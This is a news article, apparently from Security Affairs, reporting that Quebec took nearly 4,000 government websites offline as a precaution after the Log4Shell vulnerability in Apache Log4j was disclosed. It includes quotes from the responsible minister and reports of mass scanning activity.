Quebec shuts down thousands of sites as disclosure of the Log4Shell flaw

Quebec shut down nearly 4,000 of its sites i

Quebec shut down nearly 4,000 of its sites as a preventative measure after the disclosure of a PoC exploit for the Log4Shell flaw (CVE-2021-44228) in the Apache Log4j Java-based logging library.

exploit code Log4Shell

On Friday, 10, 2021, Chinese security researcher p0rz9 publicly disclosed the PoC exploit code for this issue and revealed that the CVE-2021-44228 can only be exploited if the log4j2.formatMsgNoLookups option is set to false.

Log4j is an open-source library widely used by both enterprise apps and cloud services, including Apple iCloud and Steam.

A remote, unauthenticated attacker can exploit the CVE-2021-44228 to execute arbitrary code on a vulnerable system leading to a complete system takeover.

The vulnerability was discovered by researchers from Alibaba Cloud’s security team that notified the Apache Foundation on November 24. According to the experts, the vulnerability is easy to exploit and does not require special configuration, for this reason, it received a CVSSv3 score of 10/10. Researchers pointed out that Apache Struts2, Apache Solr, Apache Druid, Apache Flink are all affected by this vulnerability.

users of Log4j

Open-source projects like ElasticSearch, Elastic Logstash, Redis, and the NSA’s Ghidra also use the library.
IT giants like Apple, Amazon, Twitter, Cloudflare, Steam, Tencent, Baidu, and NetEase are running servers potentially affected by the issue.
Security experts are already observing mass scanning activity for this vulnerability.

Mass scanning activity detected from multiple hosts checking for servers using Apache Log4j (Java logging library) vulnerable to remote code execution ( our API for “tags=CVE-2021-44228” for source IP addresses and other IOCs. #threatintel— Bad Packets (@bad_packets) December 10, 2021
GreyNoise is detecting a sharply increasing number of hosts opportunistically exploiting Apache Log4J CVE-2021-44228. Exploitation occurring from ~100 distinct hosts, almost all of which are Tor exit nodes. Tags available to all users and customers now.— GreyNoise (@GreyNoiseIO) December 10, 2021Today Canadian Minister Responsible for Digital Transformation and Access to Information Eric Caire confirmed the decision of the government to shut down the sites that are being scanned for potentially malicious purposes resulting from the exploitation of the Log4Shell flaw.

The government closed 3,992 sites including the education and higher education ministries’ sites.

“On Friday the 10th, we received, like everyone else on the planet, a status report on a computer security flaw that affects many systems,” Caire explained in a news conference. “We need to scan all of our systems,” said Caire. “We’re kind of looking for a needle in a haystack.”

The Minister explained that it is a preventive measure and they are not aware of any security breach caused by the exploitation of the issue.

“It’s a decision preventive not reactive,” added Caire.

Some of the sites that have been tacked offline are back online.

The post Quebec shuts down thousands of sites as disclosure of the Log4Shell flaw appeared first on Security Affairs.